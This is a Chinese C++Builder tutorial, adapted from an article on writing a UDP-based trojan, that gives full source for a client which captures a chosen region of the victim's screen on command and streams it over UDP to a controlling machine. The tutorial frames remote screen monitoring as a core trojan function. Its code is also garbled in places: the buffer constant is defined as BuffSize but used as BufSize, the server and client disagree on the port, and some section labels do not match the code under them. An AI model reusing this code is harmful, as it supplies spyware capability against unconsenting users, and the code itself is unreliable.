用UDP协议实现远程监视屏幕

    老妖注：这篇文档原来是"用UDP协议的木马编写方法（Delphi版)"，为了实现真正的C++Builder研究。我将他改成了CB版。呵呵。版权的没有。

木马的一个很重要的功能就是远程监视屏幕，下面的文章讲述了怎样利用UDP协议来实现，而不是我们通常用到的tcp/ip协议，很有特色，值得一学。

一、软硬件要求。
Windows95/98/2k对等网，用来监视的计算机（以下简称主控机）和被监视的计算机（以下简称受控机）都必须装有TCP/IP 协议，并正确配置。如没有网络，也可以在一台计算机上进行调试。

二、实现方法。
编制两个应用程序，一个为VClient.exe，装在受控机上，另一个为VServer.exe，装在主控机上。VServer.exe指定要监视的受控机的IP地址和将要在受控机屏幕上抓取区域的大小和位置，并发出屏幕抓取指令给VClient.exe，VClient.exe得到指令后，在受控机屏幕上选取指定区域，生成数据流，将其发回主控机，并在主控机上显示出抓取区域的BMP图象。由以上过程可以看出，该方法的关键有二：一是如何在受控机上进行屏幕抓取，二是如何通过TCP/IP协议在两台计算机中传输数据。

UDP(User Datagram Protocol，意为用户报文协议)是Internet上广泛采用的通信协议之一。与TCP协议不同，它是一种非连接的传输协议，没有确认机制，可靠性不如TCP，但它的效率却比TCP高，用于远程屏幕监视还是比较适合的。同时，UDP控件不区分服务器端和客户端，只区分发送端和接收端，编程上较为简单，故选用UDP协议，使用C++ Builder 6.0提供的TNMUDP控件。

三、创建演示程序。
第一步，编制VClient.exe文件。新建一个Application，将默认窗体的Name属性设为“Client”。加入TNMUDP控件，Name属性设为“CUDP”；LocalPort属性设为“1111”，让控件CUDP监视受控机的1111端口，当有数据发送到该口时，触发控件CUDP的OnDataReceived事件；RemotePort属性设为“2222”，当控件CUDP发送数据时，将数据发到主控机的2222口。

在Unit1.h中加入变量定义
TMemoryStream *BmpStream;  //将屏幕保存在流中
long LeftSize;    //发送每一笔数据后剩余的字节数
void __fastcall TClient::ScreenCap(int LeftPos,int TopPos,int RightPos,int BottomPos);  //自定义抓屏函数

在Unit1.cpp中加入
#define BuffSize 2048  //发送每一笔数据的缓冲区大小


在Client的OnCreate事件添加代码：
void __fastcall TClient::FormCreate(TObject *Sender)
{
BmpStream=new TMemoryStream();
}

在Client的OnDestroy事件添加代码：
void __fastcall TClient::FormDestroy(TObject *Sender)
{
delete BmpStream;        
}

在控件CUDP的OnDataReceived事件添加代码：
void __fastcall TClient::CUDPDataReceived(TComponent *Sender,int NumberBytes, AnsiString FromIP, int Port)
{
String CtrlCode;
char Buf[2048];
String TmpStr,LeftPos,TopPos,RightPos,BottomPos;
int SendSize;
TMemoryStream *MyStream = new TMemoryStream();
CUDP->ReadStream(MyStream);
CtrlCode.SetLength(NumberBytes);
MyStream->Read(&CtrlCode[1], NumberBytes);//读取控制码
delete MyStream;
//ShowMessage(CtrlCode);
if(CtrlCode.SubString(1,4)=="show")
  {// 控制码前4位为“show”表示主控机发出了抓屏指令
  if(BmpStream->Size==0)//没有数据可发，必须截屏生成数据
    {
    TmpStr=CtrlCode.SubString(6,CtrlCode.Length()-5);
    LeftPos=TmpStr.SubString(1,TmpStr.Pos(",")-1);

    TmpStr=TmpStr.SubString(LeftPos.Length()+2,TmpStr.Length()-LeftPos.Length()+1);
    TopPos=TmpStr.SubString(1,TmpStr.Pos(",")-1);

    TmpStr=TmpStr.SubString(TopPos.Length()+2,TmpStr.Length()-TopPos.Length()+1);
    RightPos=TmpStr.SubString(1,TmpStr.Pos(",")-1);

    TmpStr=TmpStr.SubString(RightPos.Length()+2,TmpStr.Length()-RightPos.Length()+1);
    BottomPos=Trim(TmpStr);

    ScreenCap(StrToInt(LeftPos),StrToInt(TopPos),StrToInt(RightPos),StrToInt(BottomPos));//截取屏幕
    }
  if(LeftSize>BufSize) SendSize=BufSize;
  else SendSize=LeftSize;
  BmpStream->ReadBuffer(Buf,SendSize);
  LeftSize=LeftSize-SendSize;
  if(LeftSize==0) BmpStream->Clear();  //清空流
  CUDP->RemoteHost=FromIP;  //FromIP为主控机IP地址
  CUDP->RemotePort=2222;  //主控机端口
  CUDP->SendBuffer(Buf,SendSize,SendSize); //将数据发到主控机的2222口
  }
}


其中ScreenCap是自定义函数，截取屏幕指定区域，代码如下：
void __fastcall TClient::ScreenCap(int LeftPos,int TopPos,int RightPos,int BottomPos)
{
int RectWidth,RectHeight;
HBITMAP Bhandle;
HDC SourceDC,DestDC;
Graphics::TBitmap *Bitmap=new Graphics::TBitmap();

RectWidth=RightPos-LeftPos;
RectHeight=BottomPos-TopPos;
SourceDC=CreateDC("DISPLAY","","",NULL);
DestDC=CreateCompatibleDC(SourceDC);
Bhandle=CreateCompatibleBitmap(SourceDC,RectWidth,RectHeight);
SelectObject(DestDC,Bhandle);
BitBlt(DestDC,0,0,RectWidth,RectHeight,SourceDC,LeftPos,TopPos,SRCCOPY);
Bitmap->Handle=Bhandle;
Bitmap->SaveToStream(BmpStream);
BmpStream->Position=0;
LeftSize=BmpStream->Size;
delete Bitmap;
DeleteDC(DestDC);
ReleaseDC(Bhandle,SourceDC);
}
存为“ClientUnit1.cpp”和“Clientclient.bpr”，
并编译。

第二步，编制VServer.exe文件。
新建C++Builber工程，将窗体的Name属性设为“Server”。加入TNMUDP控件，Name属性设为“SUDP”；LocalPort属性设为“2222”，让控件SUDP监视主控机的2222端口，当有数据发送到该口时，触发控件SUDP的OnDataReceived事件；RemotePort属性设为“1111”，当控件SUDP发送数据时，将数据发到受控机的1111口。加入控件Image1，Align属性设为“alClient”；加入控件Button1，Caption属性设为“截屏”；加入控件Label1，Caption属性设为“左：上：右：下”；加入控件Edit1，Text属性设为“0:0:100:100”；加入控件Label2，Caption属性设为“受控机IP地址”；加入控件Edit2，Text属性设为“127.0.0.1”；

在Unit1.h中加入变量定义
void __fastcall TForm1::FormCreate(TObject *Sender)
{
TmpStream=new TMemoryStream;
RsltStream=new TMemoryStream;
}

为Server的OnCreate事件添加代码：
void __fastcall TForm1::FormDestroy(TObject *Sender)
{
delete TmpStream;
delete RsltStream;        
}

为控件Button1的OnClick事件添加代码：
void __fastcall TForm1::Button1Click(TObject *Sender)
{
String C;
C=String("show ")+Edit1->Text; //抓屏的参数，需要注意的是格式为：左边界,上边界,宽度,高度 例：1,1,100,100
SUDP->RemoteHost=Edit2->Text;
SUDP->RemotePort=2223;
SUDP->LocalPort=2222;
SUDP->SendBuffer(C.c_str(),C.Length(),C.Length()); //这时的C.c_str()的格式应该类似于:"show 1,1,100,100"
TmpStream->Clear();
RsltStream->Clear();
}

为控件SUDP的OnDataReceived事件添加代码：
void __fastcall TForm1::SUDPDataReceived(TComponent *Sender,int NumberBytes, AnsiString FromIP, int Port)
{
String ReqCodeStr;
if(NumberBytes<0)
  {
  ShowMessage("未找到主机");
  return;
  }
SUDP->ReadStream(TmpStream);
RsltStream->CopyFrom(TmpStream,NumberBytes);
if(NumberBytes<BufSize) //数据已读完
  {
  RsltStream->Position=0;
  Image1->Picture->Bitmap->LoadFromStream(RsltStream);
  TmpStream->Clear();
  RsltStream->Clear();
  }
else
  {
  TmpStream->Clear();
  ReqCodeStr="show";
//  SUDP->RemoteHost=Edit2->Text;
  SUDP->SendBuffer(ReqCodeStr.c_str(),30,30);
  }
}

存为“ServerUnit1.cpp”和“ServerServer.bpr”，并编译。
---- 四、测试。

1、本地机测试：在本地机同时运行server.exe和client.exe，利用程序的默认设置，即可实现截屏。查看“控制面板”-“网络”-“TCP/IP”-“IP地址”，将程序的“客户IP地址”设为该地址 ，同样正常运行。

2、远程测试：选一台受控机，运行Client.exe；另选一台主控机，运行Server.exe，将“受控机IP地址”即Edit2的内容设为受控机的IP地址，“截屏”即可。以上简要介绍了远程屏幕抓取的实现方法，至于在主控机上一屏同时监视多个受控机，读者可自行完善。以上程序，在Windows98对等网、C++ Builder 6.0下调试通过.

来自C++ Builder 研究
www.csdn.com.cn